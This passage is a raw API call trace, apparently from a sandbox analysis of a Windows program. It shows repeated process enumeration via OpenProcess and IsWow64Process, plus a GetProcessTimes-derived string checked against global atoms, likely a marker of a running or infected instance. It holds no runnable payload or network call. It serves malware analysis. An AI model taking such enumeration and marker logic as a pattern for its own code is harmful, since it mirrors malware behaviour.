	[0107.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.364] CloseHandle (hObject=0x694) returned 1
	[0107.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.364] CloseHandle (hObject=0x694) returned 1
	[0107.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.364] CloseHandle (hObject=0x694) returned 1
	[0107.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.365] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.365] CloseHandle (hObject=0x694) returned 1
	[0107.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.365] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.365] CloseHandle (hObject=0x694) returned 1
	[0107.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.365] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.365] CloseHandle (hObject=0x694) returned 1
	[0107.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.365] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.365] CloseHandle (hObject=0x694) returned 1
	[0107.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.365] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.365] CloseHandle (hObject=0x694) returned 1
	[0107.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.365] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.366] CloseHandle (hObject=0x694) returned 1
	[0107.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.366] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.366] CloseHandle (hObject=0x694) returned 1
	[0107.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.366] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.366] CloseHandle (hObject=0x694) returned 1
	[0107.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.366] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.366] CloseHandle (hObject=0x694) returned 1
	[0107.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.366] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.366] CloseHandle (hObject=0x694) returned 1
	[0107.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.366] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.366] CloseHandle (hObject=0x694) returned 1
	[0107.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.367] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.367] CloseHandle (hObject=0x694) returned 1
	[0107.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.367] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.367] CloseHandle (hObject=0x694) returned 1
	[0107.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.367] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.367] CloseHandle (hObject=0x694) returned 1
	[0107.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.367] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.368] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.368] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.368] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.368] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.368] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.368] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.369] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.369] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.369] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.369] CloseHandle (hObject=0x694) returned 1
	[0107.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.369] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.369] CloseHandle (hObject=0x694) returned 1
	[0107.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.369] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.369] CloseHandle (hObject=0x694) returned 1
	[0107.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.369] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.369] CloseHandle (hObject=0x694) returned 1
	[0107.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.409] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.409] CloseHandle (hObject=0x694) returned 1
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.410] CloseHandle (hObject=0x694) returned 1
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.410] CloseHandle (hObject=0x694) returned 1
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.410] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.410] CloseHandle (hObject=0x694) returned 1
	[0107.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.411] CloseHandle (hObject=0x694) returned 1
	[0107.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.411] CloseHandle (hObject=0x694) returned 1
	[0107.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.411] CloseHandle (hObject=0x694) returned 1
	[0107.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.411] CloseHandle (hObject=0x694) returned 1
	[0107.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.411] CloseHandle (hObject=0x694) returned 1
	[0107.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.412] CloseHandle (hObject=0x694) returned 1
	[0107.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.412] CloseHandle (hObject=0x694) returned 1
	[0107.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.412] CloseHandle (hObject=0x694) returned 1
	[0107.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.413] CloseHandle (hObject=0x694) returned 1
	[0107.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.413] CloseHandle (hObject=0x694) returned 1
	[0107.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.413] CloseHandle (hObject=0x694) returned 1
	[0107.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.413] CloseHandle (hObject=0x694) returned 1
	[0107.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.413] CloseHandle (hObject=0x694) returned 1
	[0107.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.414] CloseHandle (hObject=0x694) returned 1
	[0107.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.414] CloseHandle (hObject=0x694) returned 1
	[0107.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.414] CloseHandle (hObject=0x694) returned 1
	[0107.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.414] CloseHandle (hObject=0x694) returned 1
	[0107.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.415] CloseHandle (hObject=0x694) returned 1
	[0107.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.415] CloseHandle (hObject=0x694) returned 1
	[0107.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.415] CloseHandle (hObject=0x694) returned 1
	[0107.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.415] CloseHandle (hObject=0x694) returned 1
	[0107.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.415] CloseHandle (hObject=0x694) returned 1
	[0107.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.416] CloseHandle (hObject=0x694) returned 1
	[0107.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.416] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.416] CloseHandle (hObject=0x694) returned 1
	[0107.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.416] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.416] CloseHandle (hObject=0x694) returned 1
	[0107.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.416] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.416] CloseHandle (hObject=0x694) returned 1
	[0107.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.416] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.416] CloseHandle (hObject=0x694) returned 1
	[0107.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.417] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.417] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.417] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.417] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.418] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.418] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.418] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.418] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.418] CloseHandle (hObject=0x694) returned 1
	[0107.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.418] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.419] CloseHandle (hObject=0x694) returned 1
	[0107.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.419] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.419] CloseHandle (hObject=0x694) returned 1
	[0107.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.419] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.419] CloseHandle (hObject=0x694) returned 1
	[0107.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.505] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.506] CloseHandle (hObject=0x694) returned 1
	[0107.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.506] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.506] CloseHandle (hObject=0x694) returned 1
	[0107.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.506] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.506] CloseHandle (hObject=0x694) returned 1
	[0107.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.507] CloseHandle (hObject=0x694) returned 1
	[0107.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.507] CloseHandle (hObject=0x694) returned 1
	[0107.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.507] CloseHandle (hObject=0x694) returned 1
	[0107.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.507] CloseHandle (hObject=0x694) returned 1
	[0107.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.508] CloseHandle (hObject=0x694) returned 1
	[0107.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.508] CloseHandle (hObject=0x694) returned 1
	[0107.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.508] CloseHandle (hObject=0x694) returned 1
	[0107.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.508] CloseHandle (hObject=0x694) returned 1
	[0107.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.509] CloseHandle (hObject=0x694) returned 1
	[0107.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.509] CloseHandle (hObject=0x694) returned 1
	[0107.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.509] CloseHandle (hObject=0x694) returned 1
	[0107.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.509] CloseHandle (hObject=0x694) returned 1
	[0107.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.509] CloseHandle (hObject=0x694) returned 1
	[0107.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.510] CloseHandle (hObject=0x694) returned 1
	[0107.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.510] CloseHandle (hObject=0x694) returned 1
	[0107.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.510] CloseHandle (hObject=0x694) returned 1
	[0107.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.510] CloseHandle (hObject=0x694) returned 1
	[0107.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.511] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.511] CloseHandle (hObject=0x694) returned 1
	[0107.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
